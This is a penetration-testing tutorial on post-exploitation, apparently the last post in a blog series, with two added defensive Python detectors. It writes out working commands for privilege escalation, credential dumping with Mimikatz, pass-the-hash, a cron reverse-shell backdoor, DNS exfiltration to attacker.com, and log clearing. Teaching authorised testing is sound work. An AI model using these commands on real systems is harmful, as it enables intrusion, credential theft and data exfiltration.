The Shell is Just the Beginning
Congratulations—you’ve exploited a vulnerability and gained access. You have a shell. But if you stop here, you’ve only scratched the surface. Post-Exploitation is where we demonstrate real business impact.
A web shell on a server is concerning. Domain Admin credentials with access to every system in the enterprise? That’s a career-ending finding for the security team (and a career-making one for you).
The Post-Exploitation Mindset
Once inside, your goals are:
- Privilege Escalation: Go from low-privilege user to admin/root.
- Credential Harvesting: Collect passwords, hashes, tokens.
- Lateral Movement: Pivot to other systems.
- Persistence: Maintain access across reboots.
- Data Exfiltration: Prove access to sensitive assets.
- Documentation: Record everything for the report.
Privilege Escalation
Your initial foothold is rarely administrator. Escalating privileges is essential.
Linux Privilege Escalation
Quick Wins
# Check sudo permissions
sudo -l
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for writable /etc/passwd
ls -la /etc/passwd
# Kernel version (for kernel exploits)
uname -a
# Find credentials
grep -r "password" /etc/ 2>/dev/null
cat ~/.bash_history
Automated Enumeration
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./linux-exploit-suggester.sh
Common Vectors
- Sudo Misconfiguration: sudo -l shows commands runnable as root.
- SUID Binaries: GTFOBins lists exploitable binaries.
- Cron Jobs: Writable scripts run by root.
- Kernel Exploits: Dirty COW, DirtyCred.
- Docker Escape: User in docker group = root.
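Turning the same checks around for the defender, here is an added example (not from the original post) that audits a host for two of the vectors above: SUID binaries that drift from an expected baseline, and root cron scripts writable by other users. The SUID_BASELINE set is an assumed, site-specific list, and the checks take plain data so they can be exercised without root.

```python
import os
import stat
import subprocess

# Assumption: a site-specific baseline of SUID binaries expected on this image.
SUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
                 "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn"}

def unexpected_suid(paths, baseline=SUID_BASELINE):
    """SUID files missing from the baseline; each one is a GTFOBins review candidate."""
    return sorted(set(paths) - set(baseline))

def writable_by_others(mode):
    """Group- or world-writable: a root cron script with this mode is the cron vector above."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def cron_commands(crontab_text):
    """Command fields of /etc/crontab-style lines; comments, blanks and VAR=value are skipped."""
    cmds = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) == 7:
            cmds.append(fields[6])
    return cmds

def risky_cron_scripts(crontab_text, mode_of):
    """Cron executables that non-owners may write; mode_of(path) -> st_mode or None."""
    risky = []
    for cmd in cron_commands(crontab_text):
        exe = cmd.split()[0]
        if (mode := mode_of(exe)) is not None and writable_by_others(mode):
            risky.append(exe)
    return risky

def live_mode(path):
    try:
        return os.stat(path).st_mode
    except OSError:
        return None

if __name__ == "__main__":
    # Same enumeration as 'find / -perm -4000 -type f', limited to the root filesystem.
    found = subprocess.run(["find", "/", "-xdev", "-perm", "-4000", "-type", "f"],
                           capture_output=True, text=True).stdout.split()
    print("SUID binaries not in baseline:", unexpected_suid(found))
    with open("/etc/crontab") as fh:
        print("Cron scripts writable by others:", risky_cron_scripts(fh.read(), live_mode))
```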
Windows Privilege Escalation
Quick Wins
# Current user
whoami /all
# System info
systeminfo
# Installed patches
wmic qfe
# Running services
wmic service list brief
# Unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Automated Enumeration
# WinPEAS
.\winPEAS.exe
# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt
.\Seatbelt.exe -group=all
Common Vectors
- Unquoted Service Paths: Place malicious exe in path.
- Weak Service Permissions: Replace service binary.
- AlwaysInstallElevated: Install MSI as SYSTEM.
- Token Impersonation: Potato attacks (JuicyPotato, PrintSpoofer).
- Credential Managers: Saved credentials in Windows Vault.
Credential Harvesting
Credentials are gold. They enable lateral movement and persistent access.
Windows Credential Harvesting
# Meterpreter
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
# Mimikatz (on Windows)
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::dcsync /user:Administrator
# Secretsdump (remote)
secretsdump.py domain/user:password@192.168.1.100
Linux Credential Harvesting
# Shadow file (requires root)
cat /etc/shadow
# SSH keys
cat /home/*/.ssh/id_rsa
# History files
cat /home/*/.bash_history
# Application configs
cat /var/www/html/config.php
cat /etc/mysql/my.cnf
Cracking Harvested Hashes
# Identify hash type
hashid hash.txt
# Crack with Hashcat
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
hashcat -m 1800 linux_shadow.txt rockyou.txt
# Crack with John
john --wordlist=rockyou.txt hashes.txt
Lateral Movement
Use harvested credentials to move through the network.
Pass-the-Hash (Windows)
# With crackmapexec
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# With psexec
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# With Evil-WinRM
evil-winrm -i 192.168.1.100 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
Pass-the-Ticket (Kerberos)
# Export tickets
mimikatz # sekurlsa::tickets /export
# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi
# Use ticket
dir \\dc01\c$
SSH Key Reuse
# Found private key
chmod 600 id_rsa
ssh -i id_rsa user@192.168.1.200
RDP
# With credentials
xfreerdp /u:Administrator /p:Password123 /v:192.168.1.100
# With hash (Restricted Admin mode)
xfreerdp /u:Administrator /pth:31d6cfe0d16ae931b73c59d7e0c089c0 /v:192.168.1.100
Persistence
Maintain access for the duration of the engagement.
Linux Persistence
# SSH authorized_keys
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
# Cron backdoor
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" >> /var/spool/cron/root
# Backdoor user
useradd -m -s /bin/bash -G sudo backdoor
echo "backdoor:password" | chpasswd
Windows Persistence
# Registry Run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe"
# Scheduled Task
schtasks /create /tn "Updater" /tr "C:\Windows\Temp\shell.exe" /sc onlogon /ru SYSTEM
# Golden Ticket (requires domain compromise)
mimikatz # kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:hash /ptt
Data Exfiltration
The final proof of impact—access to sensitive data.
What to Target
- Active Directory: Domain Admin = game over.
- Databases: Customer data, credentials.
- File Shares: Financial documents, HR records.
- Email: Executive communications.
- Source Code: Intellectual property.
Exfiltration Techniques
# Simple HTTP
python3 -m http.server 8000 # Attacker
curl http://192.168.1.50:8000/ -F "file=@secrets.txt" # Victim
# DNS exfiltration
cat secret.txt | xxd -p | while read line; do host $line.attacker.com; done
# Through legitimate services
# Upload to Dropbox, Google Drive, etc.
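The hex-label loop above leaves a distinctive trail in resolver logs: many long hex-only labels under one zone from one client in a short window. This added detector (not from the original post) flags that pattern and, going beyond the page's hex case, also scores long high-entropy labels so a base64 variant is caught; the log line format is an assumed one, constructed for the example.

```python
import math
import re
from collections import Counter, defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$", re.I)  # what 'xxd -p' lines look like as DNS labels

def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def suspicious_label(label):
    """Hex-only labels match the loop above; long high-entropy labels (>3.8 bits) catch base64 variants."""
    return bool(HEX_LABEL.match(label)) or (len(label) >= 24 and shannon_entropy(label) > 3.8)

def parse_query_line(line):
    """Constructed resolver log format: '<epoch> <client_ip> <qname>'."""
    ts, client, qname = line.split()
    return float(ts), client, qname.rstrip(".")

def detect_dns_exfil(lines, min_queries=5, window=60.0):
    """(client, zone) pairs that sent >= min_queries suspicious-label queries within `window` seconds."""
    events = defaultdict(list)
    for line in lines:
        ts, client, qname = parse_query_line(line)
        parts = qname.split(".")
        if any(suspicious_label(label) for label in parts[:-2]):
            events[(client, ".".join(parts[-2:]).lower())].append(ts)
    alerts = []
    for key, stamps in events.items():
        stamps.sort()
        lo = 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= min_queries:
                alerts.append(key)
                break
    return sorted(alerts)

# Constructed sample (not real logs): six hex-encoded lines from one client to attacker.example in ten seconds, plus benign lookups and one lone hex query.
SAMPLE_LOG = [f"{1000 + i} 10.0.0.5 {('secret line %d' % i).encode().hex()}.attacker.example"
              for i in range(6)] + [
    "1001 10.0.0.7 www.example.com",
    "1002 10.0.0.7 static-cdn-assets-prod-01.example.com",
    "1003 10.0.0.9 48656c6c6f20776f726c64.attacker.example",
]

if __name__ == "__main__":
    for client, zone in detect_dns_exfil(SAMPLE_LOG):
        print(f"ALERT: possible DNS exfiltration from {client} to {zone}")
```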
Proof Without Exfiltration
Sometimes you can’t extract data (legal, ethical, scope reasons). Document access instead:
- Screenshots of directory listings.
- File metadata (name, size, date).
- First/last lines of sensitive files.
- Record count from databases.
Covering Tracks (For Education Only)
Understanding detection helps build better defenses.
# Clear Linux logs
echo "" > /var/log/auth.log
# Clear bash history
history -c
echo "" > ~/.bash_history
# Clear Windows logs
wevtutil cl Security
wevtutil cl System
Note: In professional engagements, we don’t cover tracks. We document everything for the report. Blue teams need to know what to look for.
Wrapping Up the Engagement
Post-exploitation complete. Before moving to reporting:
- Remove Persistence: Delete backdoors, scheduled tasks.
- Clean Up Artifacts: Remove uploaded tools.
- Document Everything: Screenshots, command output, timeline.
- Debrief with Client: Preliminary findings discussion.
Summary
This concludes the Penetration Testing Explorer series. We’ve journeyed from methodology through reconnaissance, exploitation, and now post-exploitation.
Remember: The goal isn’t to “hack all the things.” It’s to demonstrate risk in a way that drives organizational change. Your report should make executives understand why they need to fund security initiatives.
Tharunaditya’s Security Note: The best pentesters are the ones who can explain findings to non-technical stakeholders. Technical skills get you in; communication skills make an impact.